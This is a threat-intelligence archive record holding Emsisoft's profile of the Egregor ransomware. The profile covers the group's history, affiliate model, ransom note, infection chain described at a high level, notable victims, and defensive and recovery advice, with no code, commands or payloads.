{
	"id": "3ee50797-786f-42ea-a32e-f0598c31feb6",
	"created_at": "2026-04-06T00:06:31.032591Z",
	"updated_at": "2026-04-10T03:21:32.256352Z",
	"deleted_at": null,
	"sha1_hash": "373012e9ab3c04923b526b0f168f33312d2d99ff",
	"title": "Ransomware Profile: Egregor",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 62231,
	"plain_text": "Ransomware Profile: Egregor\r\nBy Emsisoft Malware Lab\r\nPublished: 2021-02-15 · Archived: 2026-04-05 14:37:36 UTC\r\nEgregor is an aggressive strain of ransomware that targets large organizations. It has been extremely active since\r\nits discovery in September 2020, claiming hundreds of victims across multiple industries.\r\nThe above chart shows the number of Egregor samples submitted to ID Ransomware, an online tool that allows\r\nusers to identify which ransomware strain has encrypted their files and provides a free decryptor should one be\r\navailable.\r\nThe submission data shows that Egregor claimed a large number of victims in a very short space of time and\r\npossibly amassed victims quicker than any other group. This surge of attacks was likely the result of former Maze\r\naffiliates bringing lists of already-compromised networks to the Egregor affiliate program.\r\nWithin a month, however, a significant drop in the rate of the attacks occurred. This decrease was likely due to the\r\naffiliates who crossed over from Maze quickly exhausting their lists of already-comprised networks and\r\neffectively running out of easy prospective targets.\r\nWhat is Egregor?\r\nEgregor is a sophisticated strain of ransomware that encrypts files using ChaCha and RSA encryption and uses\r\nadvanced obfuscation techniques to thwart analysis efforts. “Egregor” is derived from the ancient Greek term for\r\n“wakeful,” an occult concept referring to the collective energy of a group of people working toward a common\r\ngoal – an appropriate name for a ransomware group.\r\nLike many other modern ransomware groups, Egregor’s operators exfiltrate data from victims and store it on their\r\nservers before the data is encrypted on the target’s machine. Egregor demands a swift response, giving victims just\r\n72 hours to make contact with attackers.\r\nIn the event of non-payment, the stolen data is published on the attacker’s website, Egregor News, which can be\r\naccessed on both the clear web and dark web. One of the last known banner messages on the Egregor News\r\nwebsite was the Christmas greeting: “Egregor Team wishes all clients happy holidays. Christmas gifts are waiting\r\nfor you. Details in your personal chat!”\r\nEgregor operates under the ransomware-as-a-service model, whereby affiliates receive a portion of ransom\r\npayments in exchange for dropping the malware onto victims’ networks. Egregor affiliates earn 70 percent of the\r\nransom payments they generate, with the remaining 30 percent going to the Egregor group. It is believed that the\r\nEgregor affiliate program attracted many ex-Maze affiliates following the sudden retirement of the Maze\r\nransomware gang in November 2020.\r\nThe Egregor-Sekhmet-Maze connection\r\nhttps://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nPage 1 of 5\n\nEgregor, Sekhmet and Maze share almost exactly the same base code. Sekhmet, a now inactive strain of\r\nransomware that was first detected in March 2020, is identical to Maze apart from one small tweak to the way it\r\nuses file markers. Egregor, in turn, is identical to Sekhmet, except for having a different file marker value and\r\nransom note text.\r\nWhile it’s not clear if the creators of Sekhmet and/or Maze are responsible for Egregor, the three variants clearly\r\nshare significant similarities. The Sekhmet leak platform – which exposed just six victims in total – went offline at\r\naround the same as the launch of the Egregor News site.\r\nThe History of Egregor\r\nEgregor was first observed in September 2020. It was an extremely active threat from the outset, claiming more\r\nthan 130 victims in the first 10 weeks, including high-value targets in the industrial goods, retail and\r\ntransportation sectors.\r\nSuspected Egregor operators arrested \r\nIn February 2021, alleged Egregor operators were arrested in Ukraine following a joint investigation by French\r\nand Ukrainian police, which was coordinated by Europol. Investigators were able to track down the unnamed\r\nsuspects by following the flow of bitcoins being handled by the alleged operators. According to France Inter, the\r\narrested suspects provided hacking, logistical and financial support for the Egregor group. On February 17, 2021,\r\nthe Ukrainian Security Service confirmed an undisclosed number of arrests in connection with the Egregor\r\noperation.\r\nThe group’s extortion site went offline around the time of the arrests, making it impossible for victims to pay a\r\nransom or contact the ransomware group. It’s worth noting that the Egregor extortion site had been going offline\r\nintermittently for some time prior to the arrests, so it’s possible that the disruption is unrelated.\r\nEgregor ransom note\r\nAfter encrypting the target system, Egregor drops a ransom note titled “RECOVER-FILES.txt” in all infected\r\ndirectories. The ransom note is fairly vague and contains no specific payment instructions. Instead, it instructs\r\nvictims to install the TOR browser, navigate to the operators’ website and open a live chat with the threat actors,\r\nwho will then provide further instructions. The note states that stolen data will be published if no contact is made\r\nwithin three days.\r\nThe note claims that after receiving payment attackers will provide full decryption of all affected machines, a file\r\nlisting of downloaded data, confirmation of the deletion of exfiltrated data and complete confidentiality.\r\nAudaciously, the note also states that operators will provide paying victims with recommendations for securing\r\ntheir networks to prevent future breaches.\r\nEgregor is the only ransomware family known to print ransom notes via available printers on compromised\r\nnetworks.\r\nWho does Egregor target?\r\nhttps://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nPage 2 of 5\n\nEgregor targets large organizations. While the industrial goods and services sector was initially most heavily hit,\r\nenterprises across a wide range of verticals have since been impacted by Egregor.\r\nEgregor primarily targets U.S.-based organizations, although a number of companies in South America, Africa,\r\nAsia, Europe and Oceania have also been infected.\r\nBefore encrypting data on a compromised machine, Egregor checks the Default Language ID of the system and\r\nuser account. The ransomware does not execute if any of the following languages are detected: Uzbek, Romanian,\r\nAzerbaijani, Turkmen, Georgian, Kyrgyz, Ukrainian, Kazakh, Tatar, Russian, Tajik, Armenian, Belarusian,\r\nRomanian.\r\nHow does Egregor spread?\r\nThe information currently available suggests that the infection chain typically starts with a phishing email, which\r\ncontains a malicious macro embedded in an attached document.\r\nUpon execution, the macro downloads commodity malware such as Qakbot, IcedID and/or Ursnif, which are used\r\nto gain an initial toehold in the target environment. The operators of QakBot, a banking Trojan that is commonly\r\nused to drop malware onto infected networks, recently switched from dropping ProLock, another prominent\r\nransomware strain, to dropping Egregor.\r\nLater in the attack chain, operators use Cobalt Strike to gather information, escalate privileges, move laterally\r\nacross the network and prepare the system for encryption. To exfiltrate data, operators typically use Rclone, an\r\nopen-source command line program used to manage cloud storage. There have also been instances of operators\r\nusing Cobalt Strike to create an RDP connection with other endpoints on the network and copying Egregor to\r\nthem.\r\nIt is important to note that because Egregor is a ransomware-as-a-service operated by multiple affiliates, infection\r\nmethods can vary. We have heard rumors of Egregor utilizing flaws in Microsoft Exchange, VBScript Engine and\r\nAdobe Flash Player, but these reports are still unsubstantiated.\r\nMajor Egregor attacks\r\nUbisoft\r\nIn October 2020, Egregor captured the attention of the cybersecurity industry with a high-profile attack on video\r\ngame developer Ubisoft. Threat actors initially released a few hundred megabytes of data relating to in-game\r\nassets, before later releasing 560GB of source code from Ubisoft’s latest action-adventure game Watch Dogs:\r\nLegion.\r\nBarnes \u0026 Noble\r\nIn October 2020, Barnes \u0026 Noble was hit with Egregor. The incident forced the U.S. bookstore giant to shut down\r\ntheir network to stop the attack from spreading, resulting in Nook users being unable to access their eBook\r\nlibraries. Threat actors claimed to have stolen financial and audit data during the attack, while email addresses,\r\nbilling addresses, shipping addresses and purchase history were also exposed on the compromised systems.\r\nhttps://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nPage 3 of 5\n\nTransLink\r\nIn December 2020, Metro Vancouver transport agency TransLink faced significant disruption after falling victim\r\nto Egregor. The attack impacted phones, online services and payment systems, leaving commuters unable to pay\r\nfor fares with credit cards or debit cards. During the incident, ransom notes were printed from TransLink printers\r\nas well as dropped digitally in infected directories.\r\nRandstad\r\nIn December 2020, Randstad, one of the largest recruitment agencies in the world, announced that their network\r\nhad been breached by Egregor. Operators published a 32.7 MB archive of exfiltrated data, which they claimed was\r\njust 1 percent of the total data stolen during the attack. The leaked data contained a range of business documents,\r\nincluding financial reports, legal documents and accounting spreadsheets.\r\nHow to protect the network from Egregor and other ransomware\r\nThe following practices may help organizations reduce the risk of an Egregor incident.\r\nCybersecurity awareness training: Because the majority of ransomware spreads through user-initiated\r\nactions, organizations should implement training initiatives that focus on teaching end users the\r\nfundamentals of cybersecurity. Ransomware and propagation methods are constantly evolving, so training\r\nmust be an ongoing process to ensure end users are across current threats.\r\nCredential hygiene: Practicing good credential hygiene can help prevent brute force attacks, mitigate the\r\neffects of credential theft and reduce the risk of unauthorized network access.\r\nMulti-factor authentication: MFA provides an extra layer of security that can help prevent unauthorized\r\naccess to accounts, tools, systems and data repositories. Organizations should consider enabling MFA\r\nwherever possible.\r\nSecurity patches: Organizations of all sizes should have a robust patch management strategy that ensures\r\nsecurity updates on all endpoints, servers, and appliances are applied as soon as possible to minimize the\r\nwindow of opportunity for an attack.\r\nBackups: Backups are one of the most effective ways of mitigating the effects of a ransomware incident.\r\nMany strains of ransomware can spread laterally across the network and encrypt locally stored backups, so\r\norganizations should use a mixture of media storage, and store backup copies both on- and off-site. See this\r\nguide for more information on creating ransomware-proof backups.\r\nSystem hardening: Hardening networks, servers, operating systems and applications is crucial for\r\nreducing the attack surface and managing potential security vulnerabilities. Disabling unneeded and\r\npotentially exploitable services such as PowerShell, RDP, Windows Script Host, Microsoft Office macros,\r\netc. reduces the risk of initial infection, while implementing the principle of least privilege can help prevent\r\nlateral movement.\r\nBlock macros: Many ransomware families are delivered via macro-embedded Microsoft Office or PDF\r\ndocuments. Organizations should review their use of macros, consider blocking all macros from the\r\nInternet, and only allow vetted and approved macros to execute from trusted locations.\r\nEmail authentication: Organizations can use a variety of email authentication techniques such as Sender\r\nPolicy Framework, DomainKeys Identified Mail, and Domain-Based Message Authentication, Reporting\r\nhttps://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nPage 4 of 5\n\nand Conformance to detect email spoofing and identify suspicious messages.\r\nNetwork segregation: Effective network segregation helps contain incidents, prevents the spread of\r\nmalware and reduces disruption to the wider business.\r\nNetwork monitoring: Organizations of all sizes must have systems in place to monitor possible data\r\nexfiltration channels and respond immediately to suspicious activity.\r\nPenetration testing: Penetration testing can be useful for revealing vulnerabilities in IT infrastructure and\r\nemployees’ susceptibility to ransomware. Results of the test can be used to allocate IT resources and\r\ninform future cybersecurity decisions.\r\nIncident response plan: Organizations should have a comprehensive incident response plan in place that\r\ndetails exactly what to do in the event of infection. A swift response can help prevent malware from\r\nspreading, minimize disruption and ensure the incident is remediated as efficiently as possible.\r\nHow to remove Egregor and other ransomware\r\nEgregor uses sophisticated encryption methods that currently make it impossible to decrypt data without paying\r\nfor an attacker-supplied decryption tool.\r\nVictims of Egregor should be prepared to restore their systems from backups, using processes that should be\r\ndefined in the organization’s incident response plan. The following actions are recommended:\r\nTake action to contain the threat.\r\nDetermine the extent of the infection.\r\nIdentify the source of the infection.\r\nCollect evidence.\r\nRestore the system from backups.\r\nEnsure all devices on the network are clean.\r\nPerform a comprehensive forensic analysis to determine the attack vector, the scope of the incident and the\r\nextent of data exfiltration.\r\nIdentify and strengthen vulnerabilities to reduce the risk of a repeat incident.\r\nSource: https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nhttps://blog.emsisoft.com/en/37810/ransomware-profile-egregor/\r\nPage 5 of 5",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/"
	],
	"report_names": [
		"ransomware-profile-egregor"
	],
	"threat_actors": [],
	"ts_created_at": 1775433991,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/373012e9ab3c04923b526b0f168f33312d2d99ff.pdf",
		"text": "https://archive.orkl.eu/373012e9ab3c04923b526b0f168f33312d2d99ff.txt",
		"img": "https://archive.orkl.eu/373012e9ab3c04923b526b0f168f33312d2d99ff.jpg"
	}
}